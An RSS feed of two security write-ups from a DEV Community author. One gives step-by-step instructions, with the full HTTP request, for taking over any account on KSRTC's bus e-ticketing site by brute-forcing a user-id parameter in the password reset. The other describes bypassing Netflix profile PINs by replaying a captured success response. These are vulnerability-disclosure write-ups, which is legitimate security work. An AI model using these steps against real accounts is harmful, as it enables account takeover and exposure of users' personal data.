<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Krishnadev P Melevila</title>
    <description>The latest articles on DEV Community by Krishnadev P Melevila (@krishnadevpmelevila).</description>
    <link>https://dev.to/krishnadevpmelevila</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F794304%2F55e368ae-b8c8-4673-8cb6-e20c0e11a8b6.png</url>
      <title>DEV Community: Krishnadev P Melevila</title>
      <link>https://dev.to/krishnadevpmelevila</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/krishnadevpmelevila"/>
    <language>en</language>
    <item>
      <title>How I Hacked Kerala Road Transport Corporation(KSRTC)?</title>
      <dc:creator>Krishnadev P Melevila</dc:creator>
      <pubDate>Thu, 03 Feb 2022 08:13:39 +0000</pubDate>
      <link>https://dev.to/krishnadevpmelevila/how-i-hacked-kerala-road-transport-corporationksrtc-425f</link>
      <guid>https://dev.to/krishnadevpmelevila/how-i-hacked-kerala-road-transport-corporationksrtc-425f</guid>
      <description>&lt;p&gt;Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration tester from Kerala, India.&lt;/p&gt;

&lt;p&gt;To know more about me, Ask google assistant “Who is Krishnadev P Melevila” Or search for my name on Google.&lt;/p&gt;

&lt;p&gt;Today it is about KSRTC!.&lt;/p&gt;

&lt;p&gt;What is KSRTC?&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Kerala State Road Transport Corporation is a state-owned road transport corporation in the Indian state of Kerala. It is one of the country’s oldest state-run public bus transport services. The corporation is divided into three zones, and its headquarters is in the state capital Thiruvananthapuram.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;KSRTC offers an online e-ticketing system, where a user can create an account and able to book tickets. The user is able to manage PNR, cancel/edit/modify tickets, etc… with the e-ticketing account. The website includes data like the user's national identification number, date of birth, passenger details, etc…&lt;br&gt;
Vulnerability: Authentication misconfiguration on password reset functionality&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Impact: CRITICAL&lt;br&gt;
Risks: Account takeover&lt;br&gt;
Priority: P1&lt;br&gt;
Scope: Full account takeover,Cancellation of other users tickets, View data of users,View PNR details of other users&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Steps to reproduce:&lt;/p&gt;

&lt;p&gt;Step 1:Visit &lt;a href="https://online.keralartc.com/oprs-web/login/forgotpw.do"&gt;https://online.keralartc.com/oprs-web/login/forgotpw.do&lt;/a&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--SXYIohI6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zbj56l49s5paq3z1vpdn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SXYIohI6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zbj56l49s5paq3z1vpdn.png" alt="KSRTC vulnerable form" width="880" height="446"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Step 2: Enter the previously registered attacker’s known email id and click submit&lt;/p&gt;

&lt;p&gt;Step 3: Click the link received on entered mail id&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--bUoeMvVM--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fbdq8hsr7ble0in9rwyl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--bUoeMvVM--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fbdq8hsr7ble0in9rwyl.png" alt="KSRTC Email" width="701" height="434"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Step 4: Enter a new password, submit and intercept that request on a web interceptor like burp suite.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Sb5E-Lk6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1rvc7iaqj52nzocpo1qy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Sb5E-Lk6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1rvc7iaqj52nzocpo1qy.png" alt="KSRTC hacked by Krishnadev P Melevila" width="880" height="385"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Step 5: On the request, you can see a parameter named “userid”, Bruteforce that user id using intruder and send the request. You can easily brute-force that user id and change any user’s password very easily.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;POST /oprs-web/user/updatePasswordNew.do HTTP/2
Host: online.keralartc.com
Cookie: &amp;lt;REDACTED&amp;gt;
Content-Length: 67
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://online.keralartc.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: &amp;lt;REDACTED&amp;gt;
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ml;q=0.8,hi;q=0.7
Connection: close

userId=1643727426333&amp;amp;newPassword=Pass123&amp;amp;rePassword=Pass123
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Step 6: After a successful brute force, You will be able to see the user’s email on the home page. With that email login with the password, you had set in the previous step.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--RInLzyUU--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/uo77wde3pypfjlcoy5dy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--RInLzyUU--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/uo77wde3pypfjlcoy5dy.png" alt="KSRTC hacked by Krishnadev P Melevila" width="880" height="371"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So that's all guys, This vulnerability is acknowledged by NCIIPC and CERT-IN! &lt;/p&gt;

&lt;p&gt;Don’t forget to follow me on medium and other social media. Also please give your 50 claps for this write-up and that’s my inspiration to write more!!&lt;/p&gt;

&lt;p&gt;My Instagram handle: &lt;a href="https://instagram.com/krishnadev_p_melevila"&gt;https://instagram.com/krishnadev_p_melevila&lt;/a&gt;&lt;br&gt;
My Twitter handle: &lt;a href="https://twitter.com/Krishnadev_P_M"&gt;https://twitter.com/Krishnadev_P_M&lt;/a&gt;&lt;br&gt;
My LinkedIn handle: &lt;a href="https://www.linkedin.com/in/krishnadevpmelevila/"&gt;https://www.linkedin.com/in/krishnadevpmelevila/&lt;/a&gt;&lt;br&gt;
My Personnel website: &lt;a href="http://krishnadevpmelevila.com/"&gt;http://krishnadevpmelevila.com/&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>burpsuite</category>
      <category>beginners</category>
      <category>security</category>
    </item>
    <item>
      <title>How I Bypassed Netflix Profile Lock?</title>
      <dc:creator>Krishnadev P Melevila</dc:creator>
      <pubDate>Sat, 15 Jan 2022 14:15:02 +0000</pubDate>
      <link>https://dev.to/krishnadevpmelevila/how-i-bypassed-netflix-profile-lock-1ana</link>
      <guid>https://dev.to/krishnadevpmelevila/how-i-bypassed-netflix-profile-lock-1ana</guid>
      <description>&lt;p&gt;Hi hackers,&lt;br&gt;
My name is Krishnadev P Melevila, Actually I write regularly on &lt;a href="https://krishnadevpmelevila.medium.com"&gt;medium blog&lt;/a&gt;, and this is my first time in Dev.to, Actually I am a 19 year old self-learned cyber security analyst. To know more about me, Just &lt;strong&gt;search “Who is Krishnadev P Melevila” On Google or Ask your Google Assistant.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The vulnerability is that one can easily bypass Netflix profile lock with response manipulation.&lt;br&gt;
Profile lock means, In Netflix, there is an option to add multiple users to one account and for the multiple accounts they can set up a profile lock for each profile with a 4 digit pin. So when someone login to the main account they are asked “Who is watching?”&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--YkRK0FpC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9a3k5v489eit6aov4y5l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--YkRK0FpC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9a3k5v489eit6aov4y5l.png" alt="Netflix Profile Lock Bypass" width="700" height="329"&gt;&lt;/a&gt;&lt;br&gt;
so after clicking profile they need to enter the profile pin to access the browse section. But there is a vulnerability in that feature. Steps to reproduce is given below:&lt;/p&gt;

&lt;p&gt;Step 1: Visit &lt;a href="https://www.netflix.com/"&gt;https://www.netflix.com/&lt;/a&gt; and login with your account then you will be asked “ Who is watching?” like the above screenshot&lt;/p&gt;

&lt;p&gt;Step2: Here all users except guests and children have profile locks. So we are going to bypass this lock.&lt;/p&gt;

&lt;p&gt;Step3: To do that we need to know at least one profile pin, say the profile pin of Krishnadev is 1704 then I will enter that pin and intercept the response of that request on burp and copy that whole success response.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;HTTP/2 200 OK
X-Robots-Tag: noindex, nofollow
X-Frame-Options: DENY
X-Debug-Tz: GMT+5.50
X-Netflix.request.toplevel.uuid: 7d4b8b6b-fed5-44de-973b-1e14de56366f-422157414
X-Netflix.execution-Time: 6
Content-Type: application/json;charset=UTF-8
Date: Mon, 27 Dec 2021 03:48:33 GMT
Content-Length: 48
Via: 2 i-01d773509d78ec561 (us-west-2)
Server: api-prod-website i-00db4a31230d33cec
X-Xss-Protection: 1; mode=block; report=https://www.netflix.com/ichnaea/log/freeform/xssreport
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Authorization,Content-Type,Content-Encoding,Accept,X-Netflix.application.name,X-Netflix.application.version,X-Netflix.esn,X-Netflix.device.type,X-Netflix.certification.version,X-Netflix.request.uuid,X-Netflix.originating.request.uuid,X-Netflix.user.id,X-Netflix.oauth.consumer.key,X-Netflix.oauth.token,X-Netflix.ichnaea.request.type,X-Netflix.Request.Routing,X-NETFLIX-PREAPP-PARTNER-ID, X-NETFLIX-PREAPP-INTEGRITY-VALUE, X-Netflix.Request.Priority,X-Netflix.Retry.Client.Policy,X-Netflix.Client.Request.Name,X-Netflix.Request.Retry.Policy,X-Netflix.Request.Retry.Policy.Default,X-Netflix.request.client.user.guid,X-Netflix.Request.NonJson.Headers,X-Netflix.esnPrefix,X-Netflix.browserName,X-Netflix.browserVersion,X-Netflix.osName,X-Netflix.osVersion,X-Netflix.uiVersion,X-Netflix.clientType,X-NETFLIX-PERSONALIZATION-ID,X-NETFLIX-DET-TOKEN,X-NETFLIX-DET-PARTNER-PAI,X-NETFLIX-RESPONSE-OVERRIDDEN,X-NETFLIX-DET-DEPRECATION
Access-Control-Expose-Headers: X-Netflix.Retry.Server.Policy,X-Netflix.Response.Tag,X-Netflix.Geo.Info,X-Netflix.request.inbound.identity.changed,Via,X-Netflix.Retry.Server.Policy.retryAfterSeconds,X-Netflix.Retry.Server.Policy.maxRetries,X-Ftl-Error,X-Netflix.uiVersion
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Origin: https://www.netflix.com
X-Originating-Url: http://www.netflix.com/api/shakti/v5185b692/profileLock
X-Netflix.nfstatus: 1_1
Set-Cookie: &amp;lt;REDACTED&amp;gt;
X-Netflix.proxy.execution-Time: 16
{"codeName":"S-Icarus-6.Alster","success":true}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Step4: Now let us bypass the profile lock of any other user, To do that first enter a wrong pin for any user and intercept the response of that request and replace the response with the above success response. and BOOM!! We got access to the Other user profiles without any authentication.&lt;/p&gt;

&lt;p&gt;I reported this to Netflix, But they said that:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Hi krishnadevpmelevila,
The functionality is only intended as a barrier for children accessing mature content within an account. Local bypass, such as this one, is considered Won't Fix. Your effort is appreciated and we hope that you will continue to research and submit any future security issues you find.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;But, My doubt is that, Then what is the use of that feature?&lt;br&gt;
Don’t forget to follow me on Dev.to and other social media and that's my inspiration to write more!!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://instagram.com/krishnadev_p_melevila"&gt;My Instagram handle&lt;/a&gt;&lt;br&gt;
&lt;a href="https://twitter.com/Krishnadev_P_M"&gt;My Twitter handle&lt;/a&gt;&lt;br&gt;
&lt;a href="https://www.linkedin.com/in/krishnadevpmelevila/"&gt;My LinkedIn handle&lt;/a&gt;&lt;br&gt;
&lt;a href="http://krishnadevpmelevila.com/"&gt;My Personnel website&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>webdev</category>
      <category>news</category>
      <category>programming</category>
    </item>
  </channel>
</rss>
